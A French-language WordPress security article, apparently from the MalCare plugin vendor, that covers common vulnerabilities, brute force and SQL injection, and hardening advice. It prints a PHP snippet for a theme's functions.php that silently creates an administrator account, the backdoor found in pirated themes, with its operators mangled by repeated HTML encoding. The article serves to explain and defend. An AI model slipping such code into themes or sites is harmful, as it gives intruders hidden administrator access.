Avant de commencer à vous montrer comment et pourquoi les hackers piratent les sites, vous devez comprendre la structure de votre site WordPress. Il est composé de fichiers et d’une base de données. Les fichiers WordPress contiennent principalement tous les paramètres et les configurations, tandis que la base de données stocke toutes les données des articles, des commentaires, des utilisateurs et un tas d’autres choses.
Ces deux éléments sont nécessaires pour générer le frontend de votre site web. Mais les deux peuvent également être exploités par les pirates.
D’abord, regardons comment les pirates s’introduisent dans les sites WordPress.
Note : Ce n’est pas un guide sur la façon de pirater un site WordPress. C’est un article éducatif pour vous montrer comment les pirates peuvent exploiter les vulnérabilités pour pirater votre site. Cela dit, commençons.
6 Vulnérabilités communes qui permettent aux pirates de pirater les sites WordPress
Pour pirater un site web, il doit avoir un point de vulnérabilité. Nous avons listé les vulnérabilités communes trouvées dans les sites WordPress :
Exécution d’une installation WordPress obsolète
Environ 44% des sites WordPress piratés fonctionnaient sur des installations obsolètes selon un rapport de 2018. En tant que propriétaire de site Web, vous verrez des mises à jour fréquentes disponibles sur l’installation WordPress, comme suit :
En général, les mises à jour transportent de nouvelles fonctionnalités, des corrections de bugs ou résolvent des problèmes d’incompatibilité. Parfois, elles portent également des correctifs de sécurité WordPress. Cela signifie que si une faille de sécurité a été découverte dans le logiciel, les développeurs la corrigent rapidement et publient une mise à jour qui supprimera la faille.
Une fois publiée, la présence d’une faille de sécurité wp est portée à la connaissance du public. Les pirates recherchent alors les sites Web qui n’ont pas été mis à jour, trouvent la faille et l’utilisent pour pirater le site.
Donc, si vous choisissez de ne pas mettre à jour votre installation WordPress, vous n’avez pas installé les nouvelles fonctions de sécurité et vous avez donné votre site Web sur un plateau aux pirates.
Toujours garder votre site Web WordPress à jour.
Tip : Les correctifs de sécurité sont déployés sous forme de mises à jour mineures. Vous pouvez dire si c’est une mise à jour majeure si c’est V5.2 ou V5.3. Une mise à jour mineure serait V5.2.1, par exemple. Par défaut, les mises à jour mineures sont automatiques, mais vous pouvez les désactiver. Nous recommandons de garder l’option de mise à jour automatique activée pour les mises à jour mineures.
En plus de garder vos plugins, vos thèmes et votre noyau à jour, nous vous suggérons fortement de garder vos sels WordPress et vos clés de sécurité à jour.
Utilisation d’informations d’identification faibles
Un autre point d’entrée commun pour les pirates est les informations d’identification faibles. Les pirates utilisent une méthode appelée attaques par force brute où ils programment des robots pour les scanner à la recherche de sites WordPress sur internet et tentent différentes combinaisons de noms d’utilisateurs et de mots de passe pour s’introduire sur le site web.
Si vous avez laissé votre nom de connexion comme ‘admin’, ils sont déjà à un pas de l’accès à votre site. Cependant, si vous avez utilisé des mots de passe courants comme « password123 », il leur est facile de les deviner. Ces bots peuvent effectuer des milliers, voire des millions de tentatives de piratage en une seule seconde (lecture recommandée – guide de protection des pages de connexion WordPress).
Nous recommandons de changer le mot de passe en une phrase de passe en combinaison avec des chiffres et des symboles pour rendre votre mot de passe plus fort que jamais comme ceci:
Avoir des thèmes piratés installés
Les thèmes premium sont attrayants et nous aimerions tous avoir un grand thème pour notre site Web afin de le rendre unique. Bien souvent, les propriétaires de sites Web sont la proie de versions gratuites, craquées ou piratées de ces thèmes. Ces thèmes provenant de sources non fiables peuvent contenir des logiciels malveillants préinstallés. En l’installant sur votre site Web WordPress, vous installez également le logiciel malveillant. Cela ouvre la porte aux pirates. Nous avons détaillé comment cela se produit plus tard.
Téléchargez toujours les thèmes uniquement à partir de sources réputées telles que le dépôt WordPress ou des places de marché comme ThemeForest et ThemeTrust.
Utilisation de plugins vulnérables
Les pirates sont constamment à l’affût pour trouver des failles dans la sécurité des plugins. S’ils en trouvent une, ils scrutent Internet à la recherche de sites WordPress sur lesquels le plugin est installé. Cela leur permet de pirater des milliers de sites web en quelques minutes.
Plusieurs fois, surtout avec les plugins gratuits, les développeurs peuvent trouver qu’ils ne peuvent plus le maintenir et abandonner le plugin. (Cela peut également se produire avec des thèmes). Dans ces cas, la sécurité du plugin devient caduque et le fait de l’avoir installé sur votre site constitue une menace.
Téléchargez des plugins uniquement à partir de sources de confiance telles que le dépôt WordPress ou CodeCanyon. Supprimez régulièrement les plugins et les thèmes WordPress que vous n’utilisez plus. Vérifiez le statut des plugins que vous utilisez pour voir s’ils sont mis à jour et maintenus par le développeur.
Utiliser un système local non sécurisé
Parfois, c’est votre ordinateur lui-même qui n’est pas sécurisé. Si quelqu’un s’introduit dans votre système, il peut facilement accéder à votre site WordPress car dans la plupart des cas, le wp-admin est déjà connecté et ouvert.
Cela peut arriver si vous n’avez pas de pare-feu ou d’outil anti-malware installé sur votre système.
Il est recommandé de ne jamais utiliser un ordinateur public ou une connexion wifi publique non sécurisée sur votre système local que vous utilisez pour exécuter votre site WordPress. Gardez toujours les outils de détection des logiciels malveillants actifs sur votre site.
Utilisation d’un mauvais service d’hébergement Web
Lorsque nous choisissons un plan d’hébergement, nous avons tendance à rechercher le moins cher. Mais le moins cher ne garantit pas toujours de bonnes mesures de sécurité.
Les serveurs partagés peuvent être moins chers mais ils mettent également votre site en danger. Vous ne pouvez pas savoir avec quels sites vous partagez un serveur web et s’ils ont mis en place des protocoles de sécurité. S’ils sont piratés, il y a des chances que l’infection par un logiciel malveillant se propage également à votre site.
Il arrive aussi que des hébergeurs de sites Web soient compromis, ce qui signifie que tous les sites Web sur la plateforme d’hébergement sont exposés à l’exploitation des pirates. »
Avant de choisir un hébergeur, lisez ce qu’il offre et ce que les clients ont à dire à son sujet. Cela vous aidera à vous faire une bonne idée de l’hébergeur à choisir.
Pour trouver un site vulnérable, les pirates créent leurs propres bots ou utilisent des scanners de vulnérabilité gratuits disponibles en ligne pour passer Internet au peigne fin. Lorsqu’ils en trouvent un, ils exploitent la faille de sécurité qu’il présente (comme celles mentionnées ci-dessus) pour avoir accès aux fichiers ou à la base de données du site WordPress.
Puis, ils injectent du code qui exécutera des activités malveillantes telles que l’envoi d’e-mails de spam, la vente de produits illégaux, etc. Ils injectent également du code pour créer de nouveaux comptes utilisateurs ou des portes dérobées WordPress qui les aideront à récupérer l’accès à votre site à tout moment.
Comment pirater un site WordPress?
Il existe d’innombrables façons de pirater un site WordPress. Ici, nous allons discuter de deux des façons les plus courantes pour les pirates d’injecter du code dans votre site Web pour créer une nouvelle connexion utilisateur :
I. Par le biais de fichiers (logiciels malveillants préinstallés dans un thème piraté)
Comme nous l’avons évoqué précédemment, de nombreux propriétaires de sites WordPress sont la proie de thèmes piratés. Vous obtenez toutes les fonctionnalités gratuitement ! Mais ces logiciels peuvent avoir un script pour créer un nouvel identifiant de connexion. Une fois que vous installez le thème, le nouveau compte utilisateur est créé et le pirate peut simplement se connecter à votre site Web à partir de l’administration de WordPress.
Nous allons vous montrer comment vous pouvez créer un nouveau compte utilisateur sur votre site Web WordPress en utilisant votre fichier de thème. Cela vous aidera à comprendre comment les thèmes piratés aident un pirate à avoir accès à votre site.
Introduction : Cela peut également être utile si vous êtes bloqué hors de votre wp-admin mais que vous avez toujours accès à votre compte d’hébergement web.
Avertissement:
S’introduire dans les coulisses d’un site WordPress est une affaire risquée. Il est préférable de le faire sur un site de test ou de mise en scène. Si vous choisissez de le faire sur votre site en direct, veillez à prendre une sauvegarde fiable. En cas de problème, vous pouvez restaurer votre sauvegarde WordPress.
Etape 1 : Connectez-vous à votre compte d’hébergement WordPress. Allez dans le cPanel et accédez au gestionnaire de fichiers.
Vous pouvez également accéder aux fichiers par le biais d’un client FTP comme FileZilla en utilisant les informations d’identification FTP.
Étape 2 : Vos fichiers WordPress résident généralement dans un dossier appelé public_html. À l’intérieur de celui-ci, vous pouvez accéder à wp_content/themes.
Étape 3 : Ici, vous devez choisir le thème actif sur votre site web et éditer le functions.php.
Étape 4 : Copiez et collez le code suivant à la fin du fichier. (S’il y a une balise de fermeture comme par exemple ?>, assurez-vous que le code vient sur la ligne avant celle-ci.)
$new_user_email = ’[email protected]’;
$new_user_password = ‘password’;
if( !username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(‘ID’ =& ;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt ; $user_id, ‘nickname’ =&amp ;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt ; $new_user_email));
$user = new WP_User($user_id);
$user-&amp ;amp;amp;amp;amp;amp;amp;amp;amp;gt;set_role(‘administrator’);
}
Editer les deux premières lignes avec l’email et le mot de passe de votre choix. Une fois que vous enregistrez le fichier et ouvrez votre site web, le code s’exécutera et vous pourrez vous connecter en utilisant ces nouvelles informations d’identification.
Nous espérons maintenant que vous comprenez que lorsque vous installez un thème piraté s’il possède ce bloc de code, un nouveau compte utilisateur sera créé. Tout ce que le pirate doit faire est d’entrer les informations d’identification et de se connecter.
II. Par la base de données – Injection SQL
C’est une autre des raisons les plus courantes pour lesquelles les sites WordPress sont piratés. Pour commencer, vous devez savoir deux choses sur les injections SQL :
-
- WordPress utilise MySQL comme système de base de données par défaut.
- Afin de générer le frontend d’un site web, WordPress utilise des requêtes SQL pour tirer des données de la base de données.
Nous n’avons pas à nous soucier de ce que c’est ou des détails pour le moment. Ce que vous devez savoir, c’est que cette base de données n’est accessible que par cPanel > phpMyAdmin. Mais les pirates trouvent des moyens d’y accéder sans utiliser cPanel. L’une des façons les plus courantes pour les pirates de contacter la base de données d’un site est de passer par des formulaires vulnérables sur un site Web.
Un formulaire est tout élément où du texte peut être saisi, comme la barre de connexion WordPress, le formulaire de contact, les commentaires de blog WordPress, les pops d’abonnement, les pages de paiement et la barre de recherche du site.
Au lieu de saisir les détails demandés dans le formulaire, le pirate entrerait ses commandes SQL malveillantes. Comme toutes les informations saisies dans le formulaire sont stockées dans votre base de données, ce code malveillant s’y retrouve.
Pour expliquer comment cela se produit, nous allons vous montrer comment créer un nouveau compte utilisateur en utilisant votre base de données.
→ Création d’un nouveau compte utilisateur par le biais de la base de données
Étape 1 : Accédez à cPanel et ouvrez phpMyAdmin >Bases de données.
Étape 2 : Ici, vous verrez une liste de bases de données. Vous devez sélectionner votre base de données. (Si vous ne connaissez pas le nom de votre base de données, vous pouvez trouver cette information dans votre wp-config, comme ceci).
Nous avons sélectionné la base de données selon le nom dans le fichier wp-config.
Etape 3 : Ensuite, parmi les tables qui s’affichent sur le panneau de droite, vous devez trouver la table qui se termine par _users (Elle sera très probablement nommée wp_users).
Etape 4 : Ici, vous pouvez cliquer sur ‘Insert’.
Etape 5 : Cela ouvrira l’écran suivant où vous pouvez entrer le nom de connexion de l’utilisateur, le mot de passe, l’email et le nom d’affichage.
Etape 6 : Ensuite, cliquez sur ‘Go’ et vos modifications seront enregistrées. Maintenant, vous pouvez vous connecter à WordPress en utilisant les nouvelles informations d’identification.
La même chose peut être faite en insérant un bloc de code SQL dans la base de données. Comme pour le thème piraté, une fois que le code entre dans la base de données, il s’exécutera et un nouvel utilisateur sera créé. Nous pouvons penser que c’est comme si un pirate créait simplement sa propre porte dans votre maison et entrait directement.
Comment empêcher les pirates de pirater votre site Web ?
Il y a quatre étapes principales que vous devez prendre pour rendre votre site suffisamment sécurisé pour tenir les pirates à distance :
Installer un plugin de sécurité WordPress
Chaque site Web WordPress a besoin d’un plugin de sécurité tel que MalCare. Protégez votre site WordPress avec un tel plugin qui va scanner le site web régulièrement. Il repérera toute activité suspecte, bloquera le trafic malveillant et empêchera les pirates d’entrer. Dans le cas où un pirate s’introduit, vous serez alerté immédiatement et vous pourrez nettoyer votre site web instantanément avant qu’il ne puisse faire des dégâts.
Installer un certificat SSL
Ce certificat fournira à votre site web un cryptage des données. Ce que cela signifie, c’est que lorsqu’une personne visite votre site Web, les données sont transférées entre son ordinateur et le serveur de votre site Web.
Si elles sont transférées en texte clair, parfois les pirates qui se cachent peuvent s’emparer de ces données. Ils peuvent les lire, les voler ou les modifier à leur guise.
Mais si elles sont cryptées, même si un pirate met la main dessus, il ne pourra pas les déchiffrer.
Vous pouvez obtenir un certificat SSL auprès de votre hébergeur ou d’un fournisseur SSL. Si vous craignez de dépenser trop pour un certificat, des fournisseurs comme LetsEncrypt offrent un SSL gratuit.
Pour apprendre à installer un certificat SSL, jetez un œil à ce guide – Passer du HTTP au HTTPS.
Réparer les vulnérabilités connues
Comme nous l’avons mentionné précédemment, il existe des vulnérabilités communes à WordPress. Nous vous recommandons de prendre les mesures suivantes pour minimiser les vulnérabilités.
-
- La mise à jour de WordPress et de ses thèmes et plugins doit être une priorité absolue.
- Assurez-vous de toujours utiliser des identifiants de connexion forts pour éviter les attaques par force brute.
- Supprimez régulièrement les thèmes et plugins inutilisés
- Ne jamais utiliser des thèmes et plugins piratés. Téléchargez toujours ces logiciels à partir de sources fiables comme le dépôt WordPress, CodeCanyon ou ThemeForest.
- Utilisez un fournisseur de services d’hébergement Web fiable.
- Gardez votre ordinateur local protégé en installant un logiciel anti-malware.
Durcir votre site WordPress
WordPress recommande que chaque site Web sur leur plateforme prenne certaines mesures pour durcir leurs sites. Certaines de ces mesures comprennent :
- Gardez un pare-feu WordPress actif. Cela aidera à bloquer la limitation du nombre de tentatives de connexion. Chaque utilisateur n’a que trois chances de saisir correctement les informations d’identification, après quoi il devra opter pour » Mot de passe oublié » ou contacter l’administrateur. Vous pouvez utiliser le même plugin MalCare pour mettre en œuvre cette étape.
- Désactiver les installations de plugins dans le cas où vous avez plusieurs utilisateurs travaillant sur le site Web. Vous voudriez vous assurer que personne n’installe un plugin librement sans vérifier s’ils sont fiables et dignes de confiance pour avoir votre site. Cela peut être fait manuellement en modifiant un fichier appelé wp-config.php dans votre installation WordPress. Vous pouvez également utiliser le plugin MalCare pour cela.
- Mettre en place une authentification à 2 facteurs pour vérifier la personne qui se connecte. Cela se fait en envoyant un mot de passe à usage unique sur le mobile ou l’email enregistré, ou en utilisant des apps comme Google Authenticator qui génèrent un mot de passe en temps réel toutes les 30 secondes.
Il existe de nombreuses autres façons de durcir votre site web. Il est recommandé de mettre en œuvre ces étapes en fonction des exigences de votre site Web.
En dehors de cela, vous pouvez prendre quelques mesures de sécurité supplémentaires. Nous vous suggérons fortement de suivre ce guide – Sécurisez votre site WordPress avec wp-config.php.
Pensées finales
Nous espérons que cet article vous a permis de mieux comprendre comment les vulnérabilités peuvent apparaître sur votre site Web et comment les pirates s’y introduisent. Les hackers n’ont pas de parti pris et cibleront à peu près n’importe quel site. Si votre site est vulnérable, il y a de très bonnes chances que vous soyez piraté.
Donc, pour résumer, nous vous recommandons de minimiser les vulnérabilités, d’installer un plugin de sécurité et de durcir votre site web afin que les pirates n’aient aucune chance d’y pénétrer.
Gardez votre site web sécurisé avec notre plugin de sécurité MalCare!